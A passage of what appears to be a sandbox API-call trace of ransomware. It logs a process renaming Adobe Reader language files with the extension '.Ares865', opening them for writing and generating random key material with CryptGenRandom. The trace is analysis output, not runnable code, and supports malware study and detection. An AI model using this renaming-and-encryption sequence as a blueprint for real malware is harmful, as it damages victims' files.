(lpString="DisplayLanguageNames.nb_NO.txt") returned 30 [0160.294] lstrlenW (lpString="Ares865") returned 7 [0160.294] lstrcmpiW (lpString1="_NO.txt", lpString2="Ares865") returned -1 [0160.294] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt.Ares865") returned 115 [0160.294] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt.ares865"), dwFlags=0x1) returned 1 [0160.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.296] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28146) returned 1 [0160.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.297] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.297] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.303] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.304] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.304] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nl.txt" | out: lpString1="DisplayLanguageNames.nl.txt") returned="DisplayLanguageNames.nl.txt" [0160.304] lstrlenW (lpString="DisplayLanguageNames.nl.txt") returned 27 [0160.305] lstrlenW (lpString="Ares865") returned 7 [0160.305] lstrcmpiW (lpString1=".nl.txt", lpString2="Ares865") returned -1 [0160.305] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt.Ares865") returned 112 [0160.305] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt.ares865"), dwFlags=0x1) returned 1 [0160.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.307] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28102) returned 1 [0160.308] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.308] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.308] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.311] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.312] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.312] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.313] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nl_BE.txt" | out: lpString1="DisplayLanguageNames.nl_BE.txt") returned="DisplayLanguageNames.nl_BE.txt" [0160.313] lstrlenW (lpString="DisplayLanguageNames.nl_BE.txt") returned 30 [0160.313] lstrlenW (lpString="Ares865") returned 7 [0160.313] lstrcmpiW (lpString1="_BE.txt", lpString2="Ares865") returned -1 [0160.313] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt.Ares865") returned 115 [0160.313] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt.ares865"), dwFlags=0x1) returned 1 [0160.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.315] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28118) returned 1 [0160.316] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.319] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.320] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.320] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.321] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nl_BE_PREEURO.txt" | out: lpString1="DisplayLanguageNames.nl_BE_PREEURO.txt") returned="DisplayLanguageNames.nl_BE_PREEURO.txt" [0160.321] lstrlenW (lpString="DisplayLanguageNames.nl_BE_PREEURO.txt") returned 38 [0160.321] lstrlenW (lpString="Ares865") returned 7 [0160.321] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0160.321] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt.Ares865") returned 123 [0160.321] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0160.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.323] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28118) returned 1 [0160.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.328] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.329] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.329] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nl_NL.txt" | out: lpString1="DisplayLanguageNames.nl_NL.txt") returned="DisplayLanguageNames.nl_NL.txt" [0160.330] lstrlenW (lpString="DisplayLanguageNames.nl_NL.txt") returned 30 [0160.330] lstrlenW (lpString="Ares865") returned 7 [0160.330] lstrcmpiW (lpString1="_NL.txt", lpString2="Ares865") returned -1 [0160.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt.Ares865") returned 115 [0160.330] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt.ares865"), dwFlags=0x1) returned 1 [0160.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28102) returned 1 [0160.332] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.333] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.333] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.336] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.336] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.336] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.337] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nl_NL_PREEURO.txt" | out: lpString1="DisplayLanguageNames.nl_NL_PREEURO.txt") returned="DisplayLanguageNames.nl_NL_PREEURO.txt" [0160.337] lstrlenW (lpString="DisplayLanguageNames.nl_NL_PREEURO.txt") returned 38 [0160.337] lstrlenW (lpString="Ares865") returned 7 [0160.337] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0160.338] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt.Ares865") returned 123 [0160.338] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0160.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.340] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28118) returned 1 [0160.340] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.341] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.341] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.345] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.346] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.346] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.347] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.nn_NO.txt" | out: lpString1="DisplayLanguageNames.nn_NO.txt") returned="DisplayLanguageNames.nn_NO.txt" [0160.347] lstrlenW (lpString="DisplayLanguageNames.nn_NO.txt") returned 30 [0160.347] lstrlenW (lpString="Ares865") returned 7 [0160.347] lstrcmpiW (lpString1="_NO.txt", lpString2="Ares865") returned -1 [0160.347] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt.Ares865") returned 115 [0160.347] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt.ares865"), dwFlags=0x1) returned 1 [0160.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.349] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28146) returned 1 [0160.349] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.350] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.350] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.354] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.355] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.355] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.356] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.pl.txt" | out: lpString1="DisplayLanguageNames.pl.txt") returned="DisplayLanguageNames.pl.txt" [0160.356] lstrlenW (lpString="DisplayLanguageNames.pl.txt") returned 27 [0160.356] lstrlenW (lpString="Ares865") returned 7 [0160.356] lstrcmpiW (lpString1=".pl.txt", lpString2="Ares865") returned -1 [0160.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt.Ares865") returned 112 [0160.356] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt.ares865"), dwFlags=0x1) returned 1 [0160.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.358] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28246) returned 1 [0160.358] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.363] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.363] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.363] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.364] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.pl_PL.txt" | out: lpString1="DisplayLanguageNames.pl_PL.txt") returned="DisplayLanguageNames.pl_PL.txt" [0160.364] lstrlenW (lpString="DisplayLanguageNames.pl_PL.txt") returned 30 [0160.364] lstrlenW (lpString="Ares865") returned 7 [0160.364] lstrcmpiW (lpString1="_PL.txt", lpString2="Ares865") returned -1 [0160.364] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt.Ares865") returned 115 [0160.365] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt.ares865"), dwFlags=0x1) returned 1 [0160.368] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28246) returned 1 [0160.368] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.372] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.373] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.373] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.374] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.pt_BR.txt" | out: lpString1="DisplayLanguageNames.pt_BR.txt") returned="DisplayLanguageNames.pt_BR.txt" [0160.374] lstrlenW (lpString="DisplayLanguageNames.pt_BR.txt") returned 30 [0160.374] lstrlenW (lpString="Ares865") returned 7 [0160.374] lstrcmpiW (lpString1="_BR.txt", lpString2="Ares865") returned -1 [0160.374] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt.Ares865") returned 115 [0160.374] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt.ares865"), dwFlags=0x1) returned 1 [0160.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28348) returned 1 [0160.380] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.381] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.381] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.384] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.385] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.385] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.386] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.pt_PT.txt" | out: lpString1="DisplayLanguageNames.pt_PT.txt") returned="DisplayLanguageNames.pt_PT.txt" [0160.386] lstrlenW (lpString="DisplayLanguageNames.pt_PT.txt") returned 30 [0160.386] lstrlenW (lpString="Ares865") returned 7 [0160.386] lstrcmpiW (lpString1="_PT.txt", lpString2="Ares865") returned -1 [0160.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt.Ares865") returned 115 [0160.386] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt.ares865"), dwFlags=0x1) returned 1 [0160.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt.Ares865" 